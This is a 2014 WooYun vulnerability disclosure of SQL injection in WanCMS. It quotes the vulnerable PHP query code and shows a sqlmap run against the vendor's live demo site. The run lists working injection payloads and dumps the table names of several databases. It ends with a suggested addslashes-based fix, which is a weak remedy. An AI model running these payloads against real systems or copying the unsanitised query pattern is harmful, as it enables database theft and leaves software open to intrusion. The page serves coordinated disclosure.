当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049372

漏洞标题:WanCMS 多处SQL注射(源码详析+实站演示)

相关厂商:wancms.com

漏洞作者: lxj616

提交时间:2014-01-26 19:21

修复时间:2014-04-26 19:22

公开时间:2014-04-26 19:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-26: 细节已通知厂商并且等待厂商处理中
2014-01-28: 厂商已经确认,细节仅向厂商公开
2014-01-31: 细节向第三方安全合作伙伴开放
2014-03-24: 细节向核心白帽子及相关领域专家公开
2014-04-03: 细节向普通白帽子公开
2014-04-13: 细节向实习白帽子公开
2014-04-26: 细节向公众公开

简要描述:

WanCMS 多处SQL注射 已经在官网演示注射,可致使所有数据库信息泄露(仅演示至跑表,足矣)
举一例分析,并给出通用的修复建议

详细说明:

举一例分析:
/app/Lib/Action/AccountsAction.class.php line:570

//之前代码略,为 public function forget_password_s() 
$username = $_GET ['username'];
//直接获取username,为什么不用框架封装的方法取得?
$ucresult = uc_user_checkname ( $username );
if ($ucresult != '-3') {
// Header("Location: /accounts/forget_password");
}
//测试时使用的吧?没有用处
$this->assign ( 'username', $username );
$member = M ( 'member' );
$u_info = $member->where ( "username ='" . $username . "'" )->find ();
//上面这句将username直接带入查询,引发了注射
$this->assign ( 'u_info', $u_info );
$this->assign ( 'username', $username );
//之后代码略,与本漏洞无关


其他注射位置:
/app/Lib/Action/LicenseAction.class.php 开头没几行

public function search(){
$domain = $_GET['domain'];
$authorization = M("authorization"); // 实例化authorization对象
$info = $authorization->where("domain ='".$domain."'")->find();
if(empty($info)){
echo "document.write('<a href='http://demo.31wan.cn/license/'>未授权</a>')";
}else{
echo "document.write('已授权')";
}
}


又是直接GET进查询语句,是不是都同样的道理呢?
这样的注射还有很多,就不分开提交通知了
下面进行sqlmap跑表,仅列出部分表名,理论上可以获取全部信息

漏洞证明:

演示:

C:\Users\Administrator>sqlmap.py -u "http://test4.31wan.cn/accounts/forget_password_s?username=lxj616" --tables


sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=lxj616') AND 3329=3329 AND ('MGNe'='MGNe
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: username=-5677') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71756c7171,0x6a6546534662544b6c64,0x7168676871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: username=lxj616') AND SLEEP(5) AND ('vuGA'='vuGA
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
Database: anzhuang
[38 tables]
+---------------------------------------+
| mygame_activities |
| mygame_activitiestype |
| mygame_ad |
| mygame_ad_where |
| mygame_admin_exec_log |
| mygame_admin_login_error |
| mygame_admin_pay |
| mygame_admin_role |
| mygame_article |
| mygame_card |
| mygame_card_log |
| mygame_card_type |
| mygame_category |
| mygame_category_list |
| mygame_cps |
| mygame_first_recharge |
| mygame_game |
| mygame_game_log |
| mygame_gametype |
| mygame_link |
| mygame_manager |
| mygame_member |
| mygame_member_bank |
| mygame_member_extend_info |
| mygame_mobilegame |
| mygame_notice |
| mygame_pay_ok |
| mygame_pay_type |
| mygame_role |
| mygame_role_access |
| mygame_server |
| mygame_soical_login |
| mygame_spend_log |
| mygame_statistical |
| mygame_web_not_allow_ip |
| mygame_webconfig |
| mygame_websdk |
| mygame_yzdx |
+---------------------------------------+
Database: 3937
[30 tables]
+---------------------------------------+
| mygame_ad |
| mygame_ad_where |
| mygame_admin_exec_log |
| mygame_admin_login_error |
| mygame_admin_pay |
| mygame_admin_role |
| mygame_article |
| mygame_card |
| mygame_card_log |
| mygame_category |
| mygame_category_list |
| mygame_cps |
| mygame_flash |
| mygame_game |
| mygame_game_log |
| mygame_gametype |
| mygame_link |
| mygame_manager |
| mygame_member |
| mygame_member_extend_info |
| mygame_menu |
| mygame_pay_ok |
| mygame_pay_type |
| mygame_role_access |
| mygame_server |
| mygame_soical_login |
| mygame_spend_log |
| mygame_statistical |
| mygame_web_not_allow_ip |
| mygame_webconfig |
+---------------------------------------+
Database: 31wanbbs
[293 tables]
+---------------------------------------+
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_connect_guest |
| pre_common_credit_log |
| pre_common_credit_log_field |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_devicetoken |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedip |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_crime |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_forum_buylog |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_medal |
| pre_common_member_newprompt |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_secwhite |
| pre_common_member_stat_field |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_optimizer |
| pre_common_patch |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_remote_port |
| pre_common_report |
| pre_common_searchindex |
| pre_common_seccheck |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_visit |
| pre_common_word |
| pre_common_word_type |
| pre_connect_disktask |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_postfeedlog |
| pre_connect_tthreadlog |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_exif |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_collection |
| pre_forum_collectioncomment |
| pre_forum_collectionfollow |
| pre_forum_collectioninvite |
| pre_forum_collectionrelated |
| pre_forum_collectionteamworker |
| pre_forum_collectionthread |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_filter_post |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupuser |
| pre_forum_hotreply_member |
| pre_forum_hotreply_number |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_newthread |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_polloption_image |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_location |
| pre_forum_post_moderate |
| pre_forum_post_tableid |
| pre_forum_postcache |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_sofa |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_moderate |
| pre_forum_threadaddviews |
| pre_forum_threadcalendar |
| pre_forum_threadclass |
| pre_forum_threadclosed |
| pre_forum_threaddisablepos |
| pre_forum_threadhidelog |
| pre_forum_threadhot |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadpreview |
| pre_forum_threadprofile |
| pre_forum_threadprofile_group |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blog_moderate |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_comment_moderate |
| pre_home_docomment |
| pre_home_doing |
| pre_home_doing_moderate |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_follow |
| pre_home_follow_feed |
| pre_home_follow_feed_archiver |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_pic_moderate |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_share_moderate |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_visitor |
| pre_mobile_setting |
| pre_mobileoem_member |
| pre_mobileoem_pushthreads |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_moderate |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_comment_moderate |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_ucenter_admins |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pm_indexes |
| pre_ucenter_pm_lists |
| pre_ucenter_pm_members |
| pre_ucenter_pm_messages_0 |
| pre_ucenter_pm_messages_1 |
| pre_ucenter_pm_messages_2 |
| pre_ucenter_pm_messages_3 |
| pre_ucenter_pm_messages_4 |
| pre_ucenter_pm_messages_5 |
| pre_ucenter_pm_messages_6 |
| pre_ucenter_pm_messages_7 |
| pre_ucenter_pm_messages_8 |
| pre_ucenter_pm_messages_9 |
| pre_ucenter_protectedmembers |
| pre_ucenter_settings |
| pre_ucenter_sqlcache |
| pre_ucenter_tags |
| pre_ucenter_vars |
+---------------------------------------+

修复方案:

使用你们自己框架带的安全函数

/**
+----------------------------------------------------------
* 如果 magic_quotes_gpc 为关闭状态,这个函数可以转义字符串
+----------------------------------------------------------
* @access public
+----------------------------------------------------------
* @param string $string 要处理的字符串
+----------------------------------------------------------
* @return string
+----------------------------------------------------------
*/
static public function addSlashes($string) {
if (!get_magic_quotes_gpc()) {
$string = addslashes($string);
}
return $string;
}
/**
+----------------------------------------------------------
* 从$_POST,$_GET,$_COOKIE,$_REQUEST等数组中获得数据
+----------------------------------------------------------
* @access public
+----------------------------------------------------------
* @param string $string 要处理的字符串
+----------------------------------------------------------
* @return string
+----------------------------------------------------------
*/
static public function getVar($string) {
return Input::stripSlashes($string);
}
/**
+----------------------------------------------------------
* 如果 magic_quotes_gpc 为开启状态,这个函数可以反转义字符串
+----------------------------------------------------------
* @access public
+----------------------------------------------------------
* @param string $string 要处理的字符串
+----------------------------------------------------------
* @return string
+----------------------------------------------------------
*/
static public function stripSlashes($string) {
if (get_magic_quotes_gpc()) {
$string = stripslashes($string);
}
return $string;
}


例:以第一个注射点为例进行修补

$username = addSlashes($_GET ['username']);
...
之后数据库中一律带着addSlashes接收
...
需要输出时(api、显示、或者就是需要原始数据)
$username_out = stripSlashes($username);


建议仔细排查代码中类似的注射点,用合理的方法修复(以上方法仅供参考)

版权声明:转载请注明来源 lxj616@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-01-28 13:46

厂商回复:

厂商会尽快修改 真诚感谢lxj616

最新状态:

暂无


漏洞评价:

评论

  1. 2014-04-28 02:20 | 小贱人 ( 路人 | Rank:4 漏洞数:3 | 资深菜鸟,)

    mark